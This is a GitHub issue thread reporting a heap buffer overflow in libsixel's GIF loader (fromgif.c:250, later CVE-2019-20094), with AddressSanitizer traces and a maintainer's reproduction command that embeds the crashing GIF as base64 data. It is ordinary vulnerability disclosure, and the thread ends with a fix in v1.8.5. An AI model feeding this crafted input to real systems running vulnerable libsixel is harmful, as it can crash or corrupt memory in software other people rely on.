saitoha / libsixel

A SIXEL encoder/decoder implementation derived from kmiya's sixel (https://github.com/saitoha/sixel).
MIT License
2.49k stars 83 forks source link

heap overflow in fromgif.c:250 #125

Closed cuanduo closed 4 years ago

cuanduo commented 4 years ago

img2sixel -I $POC

smile.zip

asan output

root@ubuntu:/home/tim/libsixel/converters# ../../libsixel-asan/converters/img2sixel -I overflows/smile.gif-out_of_bound-idx\:0xa34-0x0 
=================================================================
==57335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f84cfa29e9c at pc 0x55fd2c49e55d bp 0x7ffe53350470 sp 0x7ffe53350460
WRITE of size 1 at 0x7f84cfa29e9c thread T0
    #0 0x55fd2c49e55c in gif_init_frame /home/tim/libsixel-asan/src/fromgif.c:250
    #1 0x55fd2c4a0cba in load_gif /home/tim/libsixel-asan/src/fromgif.c:644
    #2 0x55fd2c49a9d0 in load_with_builtin /home/tim/libsixel-asan/src/loader.c:888
    #3 0x55fd2c49b3a5 in sixel_helper_load_image_file /home/tim/libsixel-asan/src/loader.c:1392
    #4 0x55fd2c44bd0c in sixel_encoder_encode /home/tim/libsixel-asan/src/encoder.c:1737
    #5 0x55fd2c441e3b in main /home/tim/libsixel-asan/converters/img2sixel.c:457
    #6 0x7f852961bb6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a)
    #7 0x55fd2c43f7a9 in _start (/home/tim/libsixel-asan/converters/img2sixel+0x397a9)

0x7f84cfa29e9c is located 0 bytes to the right of 58156700-byte region [0x7f84cc2b3800,0x7f84cfa29e9c)
allocated by thread T0 here:
    #0 0x7f8529af4448 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10c448)
    #1 0x55fd2c44204a in rpl_malloc /home/tim/libsixel-asan/converters/malloc_stub.c:45
    #2 0x55fd2c44c995 in sixel_allocator_malloc /home/tim/libsixel-asan/src/allocator.c:155
    #3 0x55fd2c49e1c5 in gif_init_frame /home/tim/libsixel-asan/src/fromgif.c:239
    #4 0x55fd2c4a0cba in load_gif /home/tim/libsixel-asan/src/fromgif.c:644
    #5 0x55fd2c49a9d0 in load_with_builtin /home/tim/libsixel-asan/src/loader.c:888
    #6 0x55fd2c49b3a5 in sixel_helper_load_image_file /home/tim/libsixel-asan/src/loader.c:1392
    #7 0x55fd2c44bd0c in sixel_encoder_encode /home/tim/libsixel-asan/src/encoder.c:1737
    #8 0x55fd2c441e3b in main /home/tim/libsixel-asan/converters/img2sixel.c:457
    #9 0x7f852961bb6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a)

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/tim/libsixel-asan/src/fromgif.c:250 in gif_init_frame
Shadow bytes around the buggy address:
  0x0ff119f3d380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff119f3d390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff119f3d3a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff119f3d3b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff119f3d3c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0ff119f3d3d0: 00 00 00[04]fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff119f3d3e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff119f3d3f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff119f3d400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff119f3d410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff119f3d420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==57335==ABORTING
root@ubuntu:/home/tim/libsixel/converters# 
saitoha commented 4 years ago

I can't reproduce it.

$ Linux vagrant 4.15.0-72-generic #81-Ubuntu SMP Tue Nov 26 12:20:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
$ git checkout v1.8.4 && (CFLAGS="-g -O0 -fno-omit-frame-pointer -fsanitize=address" ./configure && make && sudo make install) 2>&1 > /dev/null && echo H4sIAM5HA14AA3P3dLOwTIzafqjiIjMDENzlZP/9mfX///+KP1l4uRiYGXRAogZAyMD0786OwsfHeqXN88hlBC5y6ZTCJjVFAyQlpJqFIeUFk/K6gialipCasgJFSghZSiMQSaoTTeoRXMoNXWoRXAokwtSi8Q8iB2QFLjoClVsMFGFlYoFogzKQpBiZWDjAUlAGVGoRFqlOQlKBWKWk8EtZYJcSgkuhOx5JCuJTOOMfihxqUEGkNHBImcKkWBFSIsRLMeKUYlJEkuJAkWJQRZYKQEg5NDAg6ZrCIaDgAJaywLALNaT+CbE6weUwgwomxdWCPxQhUjugiuHRAtGOiEygFRJAlzUwMDshSRVCXTYDJMXBDHWrNJLUlA6DxEMtnIooUouhkSEAlIKFSy+qVCDQQCFUqccocfkPzDpCRG7Bk8fw5Ux8+RlfKYCv7MBX4pDGkMYtx8pgDQAZg3/ARQUAAA== | base64 --decode | gunzip | converters/img2sixel && echo ok
HEAD is now at 686d234 Merge branch 'release'
ar: `u' modifier ignored since `D' is the default (see `U')
q"1;1;48;48#0;2;0;0;0#1;2;87;4;3#2;2;98;95;2-------ok

Can you give me more information about your environment?

saitoha commented 4 years ago

ok, reproduced with -I option

$ git checkout v1.8.4 && (CFLAGS="-g -O0 -fno-omit-frame-pointer -fsanitize=address" ./configure && make && sudo make install) 2>&1 > /dev/null && echo H4sIAM5HA14AA3P3dLOwTIzafqjiIjMDENzlZP/9mfX///+KP1l4uRiYGXRAogZAyMD0786OwsfHeqXN88hlBC5y6ZTCJjVFAyQlpJqFIeUFk/K6gialipCasgJFSghZSiMQSaoTTeoRXMoNXWoRXAokwtSi8Q8iB2QFLjoClVsMFGFlYoFogzKQpBiZWDjAUlAGVGoRFqlOQlKBWKWk8EtZYJcSgkuhOx5JCuJTOOMfihxqUEGkNHBImcKkWBFSIsRLMeKUYlJEkuJAkWJQRZYKQEg5NDAg6ZrCIaDgAJaywLALNaT+CbE6weUwgwomxdWCPxQhUjugiuHRAtGOiEygFRJAlzUwMDshSRVCXTYDJMXBDHWrNJLUlA6DxEMtnIooUouhkSEAlIKFSy+qVCDQQCFUqccocfkPzDpCRG7Bk8fw5Ux8+RlfKYCv7MBX4pDGkMYtx8pgDQAZg3/ARQUAAA== | base64 --decode | gunzip | converters/img2sixel -I && echo ok
HEAD is now at 686d234 Merge branch 'release'
ar: `u' modifier ignored since `D' is the default (see `U')
=================================================================
==3386==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f2bf4629e9c at pc 0x7f2c542785f4 bp 0x7ffe807e8570 sp 0x7ffe807e8560
WRITE of size 1 at 0x7f2bf4629e9c thread T0
    #0 0x7f2c542785f3 in gif_init_frame /home/vagrant/libsixel/src/fromgif.c:250
    #1 0x7f2c5427ad7d in load_gif /home/vagrant/libsixel/src/fromgif.c:644
    #2 0x7f2c54274a9c in load_with_builtin /home/vagrant/libsixel/src/loader.c:888
    #3 0x7f2c54275426 in sixel_helper_load_image_file /home/vagrant/libsixel/src/loader.c:1392
    #4 0x7f2c54284d5d in sixel_encoder_encode /home/vagrant/libsixel/src/encoder.c:1737
    #5 0x55cce5eb4232 in main /home/vagrant/libsixel/converters/img2sixel.c:451
    #6 0x7f2c53e12b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #7 0x55cce5eb1c59 in _start (/home/vagrant/libsixel/converters/.libs/img2sixel+0x1c59)

0x7f2bf4629e9c is located 0 bytes to the right of 58156700-byte region [0x7f2bf0eb3800,0x7f2bf4629e9c)
allocated by thread T0 here:
    #0 0x7f2c545bbb50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50)
    #1 0x55cce5eb4523 in rpl_malloc /home/vagrant/libsixel/converters/malloc_stub.c:45
    #2 0x7f2c542924b0 in sixel_allocator_malloc /home/vagrant/libsixel/src/allocator.c:155
    #3 0x7f2c5427825c in gif_init_frame /home/vagrant/libsixel/src/fromgif.c:239
    #4 0x7f2c5427ad7d in load_gif /home/vagrant/libsixel/src/fromgif.c:644
    #5 0x7f2c54274a9c in load_with_builtin /home/vagrant/libsixel/src/loader.c:888
    #6 0x7f2c54275426 in sixel_helper_load_image_file /home/vagrant/libsixel/src/loader.c:1392
    #7 0x7f2c54284d5d in sixel_encoder_encode /home/vagrant/libsixel/src/encoder.c:1737
    #8 0x55cce5eb4232 in main /home/vagrant/libsixel/converters/img2sixel.c:451
    #9 0x7f2c53e12b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/vagrant/libsixel/src/fromgif.c:250 in gif_init_frame
Shadow bytes around the buggy address:
  0x0fe5fe8bd380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe5fe8bd390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe5fe8bd3a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe5fe8bd3b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe5fe8bd3c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe5fe8bd3d0: 00 00 00[04]fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe5fe8bd3e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe5fe8bd3f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe5fe8bd400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe5fe8bd410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe5fe8bd420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==3386==ABORTING
carnil commented 4 years ago

This issue has been assinged CVE-2019-20094.

saitoha commented 4 years ago

Fixed on v1.8.5. Thanks!